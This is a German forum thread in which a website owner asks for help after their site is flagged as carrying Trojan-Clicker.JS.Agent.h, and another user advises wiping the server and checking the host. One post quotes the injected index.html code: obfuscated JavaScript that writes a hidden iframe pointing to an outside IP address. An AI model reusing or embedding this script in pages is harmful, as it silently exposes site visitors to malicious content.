Trojan-Clicker.JS.Agent.h webseite verseucht?

#1 Hallo Ihr,

hab über google mitbekommen, das meine seite im index als gefährlich eingestuft wird. Nachdem ich alle Ordner auf dem FTP gecheckt habe und nix fand, überprüfte ich QuellCode der Seite (index)!

Fand nix ausergewöhnliches, nun legte ich den gesamten Index bereich in einen Backup ordner, so das beim aufrufen der webseite bsp. www.webseite.de/index.php/html etc leeres doc angezeigt wird, btw in diesem Fall (Fedora Core Test Page)!

Nun springt kein Virus mehr entgegen...

Nun habe ich aber endeckt, das der Virus bei der Seiten eingabe OHNE www anspringt, bsp. http://webseite.de! mein Virus programm blockt dann (kaspersky) und zeigt mir das an; gefunden: trojanisches Programm Trojan-Clicker.JS.Agent.h URL: http://webseite.de///webseite

Wie ist das möglich? Diesen Ordner gibt es garnicht??

Was kann ich tun?

ps: mein Rechner ist Sauber, zich mal gerpüft!
danke euch!

#2 verlinke mal die Webseite hier, im Original, komisch ist es schon, es kommt auch darauf an, was du auf der Seite für Content hast, also: Javascript oder andere Seitenlinks, Flash usw..
__________
MfG Sabina

rund um die PC-Sicherheit

#3 //********.de << VIRUS
//********.de/praktikum << VIRUS

www.********.de (diese ist allerdings raus, ich bin gerade dabei alles runterzuladen "zwecks Backup", danach lösch ich alle daten auf FTp)

ach ja, ich habe keine Subdomains eingerichtet, btw ich hatte mal, da ich aber bei evanzo bin und die nicht gerade die hellsten, gingen damals alle subdomains (nur eine) verloren.

ps: die orginal index.HTML sah so aus als ich Sie mir anschaute;

Zitat

<script>
<!--
var d=document,kol=561;
function O10H485CE8D9A43EC(H485CE8D9A47E6){ function H485CE8D9A4BE2() {var H485CE8D9A4FDF=16;return H485CE8D9A4FDF;} return( parseInt(H485CE8D9A47E6,H485CE8D9A4BE2()));}function H485CE8D9A53E4(H485CE8D9A57D8){ function H485CE8D9A63CC() {var H485CE8D9A67C9=2;return H485CE8D9A67C9;} var H485CE8D9A5BD5='';for(H485CE8D9A5FD0=0; H485CE8D9A5FD0<H485CE8D9A57D8.length; H485CE8D9A5FD0+=H485CE8D9A63CC()){ H485CE8D9A5BD5 += ( String.fromCharCode (O10H485CE8D9A43EC(H485CE8D9A57D8.substr(H485CE8D9A5FD0, H485CE8D9A63CC()))));}return H485CE8D9A5BD5;} document.write(H485CE8D9A53E4('3C7363726970743E696628216D796
961297B642E777269746528273C494652
414D45206E616D653D4F31207372633D5C27687474703A2F
2F37372E3232312E3133332E313731
2F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E6
46F6D28292A323639383030292B2738356436
64636464333236395C272077696474683D373130206865696768743D333830207374796C653D5C27
646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766
172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

meine Orginal datei hatte dieses script aber nie drinn? Ich frag mich wie der Code da rein kommt?

Scripte die eingebaut waren;

Zitat

<script src="Scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script type="text/javascript" src="js/prototype.js"></script>
<script type="text/javascript" src="js/scriptaculous.js?load=effects"></script>
<script type="text/javascript" src="js/lightbox.js"></script>

Die habe ich allerdings selber reingebaut, da ich sie für die Gallery brauchte!

#4

Zitat

ich bin gerade dabei alles runterzuladen "zwecks Backup", danach lösch ich alle daten auf FTp)

ja, das ist die einzige Möglichkeit, alles sauber zu bekommen

schau mal hier:
http://board.protecus.de/t33437.htm

dann frage an mal, ob dein Hoster wirklich alle Sicherheitsupdates eingespielt hat,
__________
MfG Sabina

rund um die PC-Sicherheit

#5 danke dir, habe gerade eine email an den support geschrieben, weiterhin alle daten vom Server gelöscht. Der ist nun völlig leer, dennoch kommt trotz leerem Server der Virus beim aufrufen der URL!

Das muss wohl am Anbieter liegen!

-.- Schei... evanzo!